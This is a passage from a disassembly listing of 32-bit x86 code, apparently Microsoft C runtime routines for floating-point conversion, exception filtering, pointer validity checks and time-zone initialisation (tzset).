cmp ecx, [ebp+var_18]
jl short loc_4327B8
mov edx, [ebp+var_C]
sub edx, [ebp+var_18]
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov esi, [ebp+arg_0]
mov edx, [esi+edx*4]
mov [ecx+eax*4], edx
jmp short loc_4327C5
; ---------------------------------------------------------------------------
loc_4327B8: ; CODE XREF: sub_4326E0+BF�j
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+eax*4], 0
loc_4327C5: ; CODE XREF: sub_4326E0+D6�j
jmp short loc_43278A
; ---------------------------------------------------------------------------
loc_4327C7: ; CODE XREF: sub_4326E0+B7�j
pop esi
mov esp, ebp
pop ebp
retn
sub_4326E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4327D0 proc near ; CODE XREF: sub_432A20+10�p
; sub_432A40+10�p
var_34 = dword ptr -34h
var_30 = byte ptr -30h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 34h
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax+0Ah]
and ecx, 7FFFh
sub ecx, 3FFFh
mov [ebp+var_4], ecx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx+0Ah]
and eax, 8000h
mov [ebp+var_20], eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+6]
mov [ebp+var_18], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+2]
mov [ebp+var_14], ecx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx]
shl eax, 10h
mov [ebp+var_10], eax
cmp [ebp+var_4], 0FFFFC001h
jnz short loc_432860
mov [ebp+var_8], 0
lea ecx, [ebp+var_18]
push ecx
call sub_4326A0
add esp, 4
test eax, eax
jz short loc_432848
mov [ebp+var_1C], 0
jmp short loc_43285B
; ---------------------------------------------------------------------------
loc_432848: ; CODE XREF: sub_4327D0+6D�j
lea edx, [ebp+var_18]
push edx
call sub_432670
add esp, 4
mov [ebp+var_1C], 2
loc_43285B: ; CODE XREF: sub_4327D0+76�j
jmp loc_4329AC
; ---------------------------------------------------------------------------
loc_432860: ; CODE XREF: sub_4327D0+56�j
lea eax, [ebp+var_18]
push eax
lea ecx, [ebp+var_30]
push ecx
call sub_432620
add esp, 8
mov edx, [ebp+arg_8]
mov eax, [edx+8]
push eax
lea ecx, [ebp+var_18]
push ecx
call sub_432540
add esp, 8
test eax, eax
jz short loc_432890
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
loc_432890: ; CODE XREF: sub_4327D0+B5�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov edx, [eax+4]
sub edx, [ecx+8]
cmp [ebp+var_4], edx
jge short loc_4328C0
lea eax, [ebp+var_18]
push eax
call sub_432670
add esp, 4
mov [ebp+var_8], 0
mov [ebp+var_1C], 2
jmp loc_4329AC
; ---------------------------------------------------------------------------
loc_4328C0: ; CODE XREF: sub_4327D0+CF�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
cmp edx, [ecx+4]
jg short loc_432930
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
sub ecx, [ebp+var_4]
mov [ebp+var_34], ecx
lea edx, [ebp+var_30]
push edx
lea eax, [ebp+var_18]
push eax
call sub_432620
add esp, 8
mov ecx, [ebp+var_34]
push ecx
lea edx, [ebp+var_18]
push edx
call sub_4326E0
add esp, 8
mov eax, [ebp+arg_8]
mov ecx, [eax+8]
push ecx
lea edx, [ebp+var_18]
push edx
call sub_432540
add esp, 8
mov eax, [ebp+arg_8]
mov ecx, [eax+0Ch]
add ecx, 1
push ecx
lea edx, [ebp+var_18]
push edx
call sub_4326E0
add esp, 8
mov [ebp+var_8], 0
mov [ebp+var_1C], 2
jmp short loc_4329AC
; ---------------------------------------------------------------------------
loc_432930: ; CODE XREF: sub_4327D0+F9�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
cmp ecx, [eax]
jl short loc_43297B
lea edx, [ebp+var_18]
push edx
call sub_432670
add esp, 4
mov eax, [ebp+var_18]
or eax, 80000000h
mov [ebp+var_18], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
push edx
lea eax, [ebp+var_18]
push eax
call sub_4326E0
add esp, 8
mov ecx, [ebp+arg_8]
mov edx, [ecx]
mov eax, [ebp+arg_8]
add edx, [eax+14h]
mov [ebp+var_8], edx
mov [ebp+var_1C], 1
jmp short loc_4329AC
; ---------------------------------------------------------------------------
loc_43297B: ; CODE XREF: sub_4327D0+168�j
mov ecx, [ebp+arg_8]
mov edx, [ebp+var_4]
add edx, [ecx+14h]
mov [ebp+var_8], edx
mov eax, [ebp+var_18]
and eax, 7FFFFFFFh
mov [ebp+var_18], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
push edx
lea eax, [ebp+var_18]
push eax
call sub_4326E0
add esp, 8
mov [ebp+var_1C], 0
loc_4329AC: ; CODE XREF: sub_4327D0:loc_43285B�j
; sub_4327D0+EB�j ...
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
add edx, 1
mov eax, 20h
sub eax, edx
mov [ebp+var_C], eax
mov edx, [ebp+var_8]
mov ecx, [ebp+var_C]
shl edx, cl
mov eax, [ebp+var_18]
or eax, edx
mov ecx, [ebp+var_20]
neg ecx
sbb ecx, ecx
and ecx, 80000000h
or eax, ecx
mov [ebp+var_24], eax
mov edx, [ebp+arg_8]
cmp dword ptr [edx+10h], 40h
jnz short loc_4329FA
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_24]
mov [eax+4], ecx
mov edx, [ebp+arg_4]
mov eax, [ebp+var_14]
mov [edx], eax
jmp short loc_432A0B
; ---------------------------------------------------------------------------
loc_4329FA: ; CODE XREF: sub_4327D0+215�j
mov ecx, [ebp+arg_8]
cmp dword ptr [ecx+10h], 20h
jnz short loc_432A0B
mov edx, [ebp+arg_4]
mov eax, [ebp+var_24]
mov [edx], eax
loc_432A0B: ; CODE XREF: sub_4327D0+228�j
; sub_4327D0+231�j
mov eax, [ebp+var_1C]
mov esp, ebp
pop ebp
retn
sub_4327D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432A20 proc near ; CODE XREF: sub_432B20+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_454458
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4327D0
add esp, 0Ch
pop ebp
retn
sub_432A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432A40 proc near ; CODE XREF: sub_432BA0+2A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push offset dword_454470
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_4327D0
add esp, 0Ch
pop ebp
retn
sub_432A40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432A60 proc near ; CODE XREF: _0:00432B8A�p _0:00436F4F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_14], 0
mov eax, [ebp+arg_0]
xor ecx, ecx
mov cx, [eax+0Ah]
and ecx, 7FFFh
mov word ptr [ebp+var_4], cx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx+0Ah]
and eax, 8000h
mov word ptr [ebp+var_18], ax
mov ecx, [ebp+arg_0]
mov edx, [ecx+6]
mov [ebp+var_10], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+2]
mov [ebp+var_C], ecx
mov edx, [ebp+arg_0]
xor eax, eax
mov ax, [edx]
shl eax, 10h
mov [ebp+var_8], eax
push 40h
lea ecx, [ebp+var_10]
push ecx
call sub_432540
add esp, 8
test eax, eax
jz short loc_432AD7
mov [ebp+var_10], 80000000h
mov dx, word ptr [ebp+var_4]
add dx, 1
mov word ptr [ebp+var_4], dx
loc_432AD7: ; CODE XREF: sub_432A60+62�j
mov eax, [ebp+var_4]
and eax, 0FFFFh
cmp eax, 7FFFh
jnz short loc_432AED
mov [ebp+var_14], 1
loc_432AED: ; CODE XREF: sub_432A60+84�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_10]
mov [ecx+4], edx
mov eax, [ebp+arg_4]
mov ecx, [ebp+var_C]
mov [eax], ecx
mov edx, [ebp+var_18]
and edx, 0FFFFh
mov eax, [ebp+var_4]
and eax, 0FFFFh
or edx, eax
mov ecx, [ebp+arg_4]
mov [ecx+8], dx
mov eax, [ebp+var_14]
mov esp, ebp
pop ebp
retn
sub_432A60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432B20 proc near ; CODE XREF: sub_42C640+14�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call sub_4363F0
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_432A20
add esp, 8
mov esp, ebp
pop ebp
retn
sub_432B20 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 1
mov eax, [ebp+0Ch]
push eax
lea ecx, [ebp-10h]
push ecx
lea edx, [ebp-0Ch]
push edx
call sub_4363F0
add esp, 1Ch
mov eax, [ebp+8]
push eax
lea ecx, [ebp-0Ch]
push ecx
call sub_432A60
add esp, 8
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432BA0 proc near ; CODE XREF: sub_42C640+34�p
var_10 = byte ptr -10h
var_C = byte ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push 0
push 0
push 0
push 0
mov eax, [ebp+arg_4]
push eax
lea ecx, [ebp+var_10]
push ecx
lea edx, [ebp+var_C]
push edx
call sub_4363F0
add esp, 1Ch
mov eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_432A40
add esp, 8
mov esp, ebp
pop ebp
retn
sub_432BA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432BE0 proc near ; CODE XREF: sub_42C690+4D�p
; sub_42C880+45�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_8]
mov edx, [ecx+0Ch]
mov [ebp+var_8], edx
mov eax, [ebp+var_4]
mov byte ptr [eax], 30h
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
loc_432C04: ; CODE XREF: sub_432BE0+69�j
cmp [ebp+arg_4], 0
jle short loc_432C4B
mov edx, [ebp+var_8]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_432C28
mov ecx, [ebp+var_8]
movsx edx, byte ptr [ecx]
mov [ebp+var_C], edx
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
jmp short loc_432C2F
; ---------------------------------------------------------------------------
loc_432C28: ; CODE XREF: sub_432BE0+32�j
mov [ebp+var_C], 30h
loc_432C2F: ; CODE XREF: sub_432BE0+46�j
mov ecx, [ebp+var_4]
mov dl, byte ptr [ebp+var_C]
mov [ecx], dl
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
sub ecx, 1
mov [ebp+arg_4], ecx
jmp short loc_432C04
; ---------------------------------------------------------------------------
loc_432C4B: ; CODE XREF: sub_432BE0+28�j
mov edx, [ebp+var_4]
mov byte ptr [edx], 0
cmp [ebp+arg_4], 0
jl short loc_432C94
mov eax, [ebp+var_8]
movsx ecx, byte ptr [eax]
cmp ecx, 35h
jl short loc_432C94
mov edx, [ebp+var_4]
sub edx, 1
mov [ebp+var_4], edx
loc_432C6B: ; CODE XREF: sub_432BE0+A5�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
cmp ecx, 39h
jnz short loc_432C87
mov edx, [ebp+var_4]
mov byte ptr [edx], 30h
mov eax, [ebp+var_4]
sub eax, 1
mov [ebp+var_4], eax
jmp short loc_432C6B
; ---------------------------------------------------------------------------
loc_432C87: ; CODE XREF: sub_432BE0+94�j
mov ecx, [ebp+var_4]
mov dl, [ecx]
add dl, 1
mov eax, [ebp+var_4]
mov [eax], dl
loc_432C94: ; CODE XREF: sub_432BE0+75�j
; sub_432BE0+80�j
mov ecx, [ebp+arg_0]
movsx edx, byte ptr [ecx]
cmp edx, 31h
jnz short loc_432CB0
mov eax, [ebp+arg_8]
mov ecx, [eax+4]
add ecx, 1
mov edx, [ebp+arg_8]
mov [edx+4], ecx
jmp short loc_432CD6
; ---------------------------------------------------------------------------
loc_432CB0: ; CODE XREF: sub_432BE0+BD�j
mov eax, [ebp+arg_0]
add eax, 1
push eax
call sub_41BC70
add esp, 4
add eax, 1
push eax
mov ecx, [ebp+arg_0]
add ecx, 1
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_420840
add esp, 0Ch
loc_432CD6: ; CODE XREF: sub_432BE0+CE�j
mov esp, ebp
pop ebp
retn
sub_432BE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432CE0 proc near ; CODE XREF: sub_42C690+1E�p
; sub_42C880+1E�p ...
var_28 = word ptr -28h
var_26 = byte ptr -26h
var_24 = byte ptr -24h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = word ptr -4
arg_0 = byte ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+arg_0]
push eax
lea ecx, [ebp+var_C]
push ecx
call sub_432D60
add esp, 8
lea edx, [ebp+var_28]
push edx
push 0
push 11h
sub esp, 0Ch
mov eax, esp
mov ecx, [ebp+var_C]
mov [eax], ecx
mov edx, [ebp+var_8]
mov [eax+4], edx
mov cx, [ebp+var_4]
mov [eax+8], cx
call sub_436F70
add esp, 18h
mov edx, [ebp+arg_8]
mov [edx+8], eax
movsx eax, [ebp+var_26]
mov ecx, [ebp+arg_8]
mov [ecx], eax
movsx edx, [ebp+var_28]
mov eax, [ebp+arg_8]
mov [eax+4], edx
lea ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_C]
push edx
call sub_41F620
add esp, 8
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov eax, [ebp+arg_8]
mov esp, ebp
pop ebp
retn
sub_432CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432D60 proc near ; CODE XREF: sub_432CE0+E�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_C], 80000000h
mov word ptr [ebp+var_4], 0
mov eax, [ebp+arg_4]
xor ecx, ecx
mov cx, [eax+6]
and ecx, 7FF0h
sar ecx, 4
mov word ptr [ebp+var_14], cx
mov edx, [ebp+arg_4]
xor eax, eax
mov ax, [edx+6]
and eax, 8000h
mov word ptr [ebp+var_18], ax
mov ecx, [ebp+arg_4]
mov edx, [ecx+4]
and edx, 0FFFFFh
mov [ebp+var_8], edx
mov eax, [ebp+arg_4]
mov ecx, [eax]
mov [ebp+var_10], ecx
mov edx, [ebp+var_14]
and edx, 0FFFFh
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jz short loc_432DD7
cmp [ebp+var_1C], 7FFh
jz short loc_432DCF
jmp short loc_432E1A
; ---------------------------------------------------------------------------
loc_432DCF: ; CODE XREF: sub_432D60+6B�j
mov word ptr [ebp+var_4], 7FFFh
jmp short loc_432E35
; ---------------------------------------------------------------------------
loc_432DD7: ; CODE XREF: sub_432D60+62�j
cmp [ebp+var_8], 0
jnz short loc_432E04
cmp [ebp+var_10], 0
jnz short loc_432E04
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_0]
mov word ptr [edx+8], 0
jmp loc_432EBE
; ---------------------------------------------------------------------------
loc_432E04: ; CODE XREF: sub_432D60+7B�j
; sub_432D60+81�j
movsx eax, word ptr [ebp+var_14]
add eax, 3C01h
mov word ptr [ebp+var_4], ax
mov [ebp+var_C], 0
jmp short loc_432E35
; ---------------------------------------------------------------------------
loc_432E1A: ; CODE XREF: sub_432D60+6D�j
mov cx, word ptr [ebp+var_14]
sub cx, 3FFh
mov word ptr [ebp+var_14], cx
movsx edx, word ptr [ebp+var_14]
add edx, 3FFFh
mov word ptr [ebp+var_4], dx
loc_432E35: ; CODE XREF: sub_432D60+75�j
; sub_432D60+B8�j
mov eax, [ebp+var_8]
shl eax, 0Bh
mov ecx, [ebp+var_C]
or ecx, eax
mov edx, [ebp+var_10]
shr edx, 15h
or ecx, edx
mov eax, [ebp+arg_0]
mov [eax+4], ecx
mov ecx, [ebp+var_10]
shl ecx, 0Bh
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_432E59: ; CODE XREF: sub_432D60+142�j
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
and ecx, 80000000h
test ecx, ecx
jnz short loc_432EA4
mov edx, [ebp+arg_0]
mov eax, [edx+4]
shl eax, 1
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, 80000000h
neg edx
sbb edx, edx
neg edx
or eax, edx
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
mov eax, [edx]
shl eax, 1
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov dx, word ptr [ebp+var_4]
sub dx, 1
mov word ptr [ebp+var_4], dx
jmp short loc_432E59
; ---------------------------------------------------------------------------
loc_432EA4: ; CODE XREF: sub_432D60+107�j
mov eax, [ebp+var_18]
and eax, 0FFFFh
mov ecx, [ebp+var_4]
and ecx, 0FFFFh
or eax, ecx
mov edx, [ebp+arg_0]
mov [edx+8], ax
loc_432EBE: ; CODE XREF: sub_432D60+9F�j
mov esp, ebp
pop ebp
retn
sub_432D60 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 2
call sub_422270
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432EE0 proc near ; DATA XREF: sub_432F40+3�o
; _2:004541A8�o ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov ecx, [eax]
cmp dword ptr [ecx], 0E06D7363h
jnz short loc_432F0E
mov edx, [ebp+arg_0]
mov eax, [edx]
cmp dword ptr [eax+10h], 3
jnz short loc_432F0E
mov ecx, [ebp+arg_0]
mov edx, [ecx]
cmp dword ptr [edx+14h], 19930520h
jnz short loc_432F0E
call sub_42D860
loc_432F0E: ; CODE XREF: sub_432EE0+E�j
; sub_432EE0+19�j ...
cmp ds:dword_4F3554, 0
jz short loc_432F35
mov eax, ds:dword_4F3554
push eax
call sub_432FE0
add esp, 4
test eax, eax
jz short loc_432F35
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F3554
jmp short loc_432F37
; ---------------------------------------------------------------------------
loc_432F35: ; CODE XREF: sub_432EE0+35�j
; sub_432EE0+47�j
xor eax, eax
loc_432F37: ; CODE XREF: sub_432EE0+53�j
pop ebp
retn 4
sub_432EE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432F40 proc near ; DATA XREF: _2:0043F02C�o
push ebp
mov ebp, esp
push offset sub_432EE0
call ds:off_4F5300
mov ds:dword_4F3554, eax
pop ebp
retn
sub_432F40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432F60 proc near ; DATA XREF: _2:0043F044�o
push ebp
mov ebp, esp
mov eax, ds:dword_4F3554
push eax
call ds:off_4F5300
pop ebp
retn
sub_432F60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432F80 proc near ; CODE XREF: sub_42CCA0+9E�p
; sub_42D4B0+77�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F5470 ; IsBadReadPtr
test eax, eax
jz short loc_432FA4
mov [ebp+var_4], 0
loc_432FA4: ; CODE XREF: sub_432F80+1B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_432F80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432FB0 proc near ; CODE XREF: sub_42D4B0+89�p
; sub_42D4B0+ED�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call ds:dword_4F546C ; IsBadWritePtr
test eax, eax
jz short loc_432FD4
mov [ebp+var_4], 0
loc_432FD4: ; CODE XREF: sub_432FB0+1B�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_432FB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_432FE0 proc near ; CODE XREF: sub_42D4B0+1E2�p
; sub_432EE0+3D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 1
mov eax, [ebp+arg_0]
push eax
call ds:dword_4F52FC ; IsBadCodePtr
test eax, eax
jz short loc_433000
mov [ebp+var_4], 0
loc_433000: ; CODE XREF: sub_432FE0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_432FE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433010 proc near ; CODE XREF: sub_42D8CE�p
push ebp
mov ebp, esp
push 0Ah
call sub_42FF30
add esp, 4
push 16h
call sub_4307E0
add esp, 4
push 3
call sub_41E8C0
pop ebp
retn
sub_433010 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433030 proc near ; CODE XREF: sub_42D9A0+8A�p
; sub_437D10:loc_43822B�p
push ebp
mov ebp, esp
cmp ds:dword_4F3610, 0
jnz short loc_43306B
push 0Bh
call sub_423280
add esp, 4
cmp ds:dword_4F3610, 0
jnz short loc_433061
call sub_433090
mov eax, ds:dword_4F3610
add eax, 1
mov ds:dword_4F3610, eax
loc_433061: ; CODE XREF: sub_433030+1D�j
push 0Bh
call sub_423320
add esp, 4
loc_43306B: ; CODE XREF: sub_433030+A�j
pop ebp
retn
sub_433030 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push 0Bh
call sub_423280
add esp, 4
call sub_433090
push 0Bh
call sub_423320
add esp, 4
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_433090 proc near ; CODE XREF: sub_433030+1F�p
; _0:0043307D�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov [ebp+var_4], 0
push 0Ch
call sub_423280
add esp, 4
mov ds:dword_4F3558, 0
mov ds:dword_454530, 0FFFFFFFFh
mov eax, ds:dword_454530
mov ds:dword_454520, eax
push offset aTz ; "TZ"
call sub_4374C0
add esp, 4
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz loc_433213
push 0Ch
call sub_423320
add esp, 4
push offset dword_4F3560
call ds:dword_4F547C ; GetTimeZoneInformation
cmp eax, 0FFFFFFFFh
jz loc_43320E
mov ds:dword_4F3558, 1
mov ecx, ds:dword_4F3560
imul ecx, 3Ch
mov ds:dword_454488, ecx
xor edx, edx
mov dx, ds:word_4F35A6
test edx, edx
jz short loc_433139
mov eax, ds:dword_4F35B4
imul eax, 3Ch
mov ecx, ds:dword_454488
add ecx, eax
mov ds:dword_454488, ecx
loc_433139: ; CODE XREF: sub_433090+91�j
xor edx, edx
mov dx, ds:word_4F35FA
test edx, edx
jz short loc_43316E
cmp ds:dword_4F3608, 0
jz short loc_43316E
mov ds:dword_45448C, 1
mov eax, ds:dword_4F3608
sub eax, ds:dword_4F35B4
imul eax, 3Ch
mov ds:dword_454490, eax
jmp short loc_433182
; ---------------------------------------------------------------------------
loc_43316E: ; CODE XREF: sub_433090+B4�j
; sub_433090+BD�j
mov ds:dword_45448C, 0
mov ds:dword_454490, 0
loc_433182: ; CODE XREF: sub_433090+DC�j
lea ecx, [ebp+var_8]
push ecx
push 0
push 3Fh
mov edx, ds:off_454514
push edx
push 0FFFFFFFFh
push offset dword_4F3564
push 220h
mov eax, ds:dword_4F3408
push eax
call ds:dword_4F5450 ; WideCharToMultiByte
test eax, eax
jz short loc_4331BF
cmp [ebp+var_8], 0
jnz short loc_4331BF
mov ecx, ds:off_454514
mov byte ptr [ecx+3Fh], 0
jmp short loc_4331C8
; ---------------------------------------------------------------------------
loc_4331BF: ; CODE XREF: sub_433090+11B�j
; sub_433090+121�j
mov edx, ds:off_454514
mov byte ptr [edx], 0
loc_4331C8: ; CODE XREF: sub_433090+12D�j
lea eax, [ebp+var_8]
push eax
push 0
push 3Fh
mov ecx, ds:off_454518
push ecx
push 0FFFFFFFFh
push offset dword_4F35B8
push 220h
mov edx, ds:dword_4F3408
push edx
call ds:dword_4F5450 ; WideCharToMultiByte
test eax, eax
jz short loc_433205
cmp [ebp+var_8], 0
jnz short loc_433205
mov eax, ds:off_454518
mov byte ptr [eax+3Fh], 0
jmp short loc_43320E
; ---------------------------------------------------------------------------
loc_433205: ; CODE XREF: sub_433090+162�j
; sub_433090+168�j
mov ecx, ds:off_454518
mov byte ptr [ecx], 0
loc_43320E: ; CODE XREF: sub_433090+67�j
; sub_433090+173�j
jmp loc_433437
; ---------------------------------------------------------------------------
loc_433213: ; CODE XREF: sub_433090+49�j
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_43323D
cmp ds:dword_4F360C, 0
jz short loc_43324C
mov ecx, ds:dword_4F360C
push ecx
mov edx, [ebp+var_C]
push edx
call sub_41F7E0
add esp, 8
test eax, eax
jnz short loc_43324C
loc_43323D: ; CODE XREF: sub_433090+18B�j
push 0Ch
call sub_423320
add esp, 4
jmp loc_433437
; ---------------------------------------------------------------------------
loc_43324C: ; CODE XREF: sub_433090+194�j
; sub_433090+1AB�j
push 2
mov eax, ds:dword_4F360C
push eax
call sub_41CA10
add esp, 8
push 10Ch
push offset aTzset_c ; "tzset.c"
push 2
mov ecx, [ebp+var_C]
push ecx
call sub_41BC70
add esp, 4
add eax, 1
push eax
call sub_41BE70
add esp, 10h
mov ds:dword_4F360C, eax
cmp ds:dword_4F360C, 0
jnz short loc_43329D
push 0Ch
call sub_423320
add esp, 4
jmp loc_433437
; ---------------------------------------------------------------------------
loc_43329D: ; CODE XREF: sub_433090+1FC�j
mov edx, [ebp+var_C]
push edx
mov eax, ds:dword_4F360C
push eax
call sub_41F620
add esp, 8
push 0Ch
call sub_423320
add esp, 4
push 3
mov ecx, [ebp+var_C]
push ecx
mov edx, ds:off_454514
push edx
call sub_41E510
add esp, 0Ch
mov eax, ds:off_454514
mov byte ptr [eax+3], 0
mov ecx, [ebp+var_C]
add ecx, 3
mov [ebp+var_C], ecx
mov edx, [ebp+var_C]
movsx eax, byte ptr [edx]
cmp eax, 2Dh
jnz short loc_4332FD
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_4332FD: ; CODE XREF: sub_433090+259�j
mov eax, [ebp+var_C]
push eax
call sub_41E610
add esp, 4
imul eax, 0E10h
mov ds:dword_454488, eax
loc_433314: ; CODE XREF: sub_433090+2AE�j
mov ecx, [ebp+var_C]
movsx edx, byte ptr [ecx]
cmp edx, 2Bh
jz short loc_433335
mov eax, [ebp+var_C]
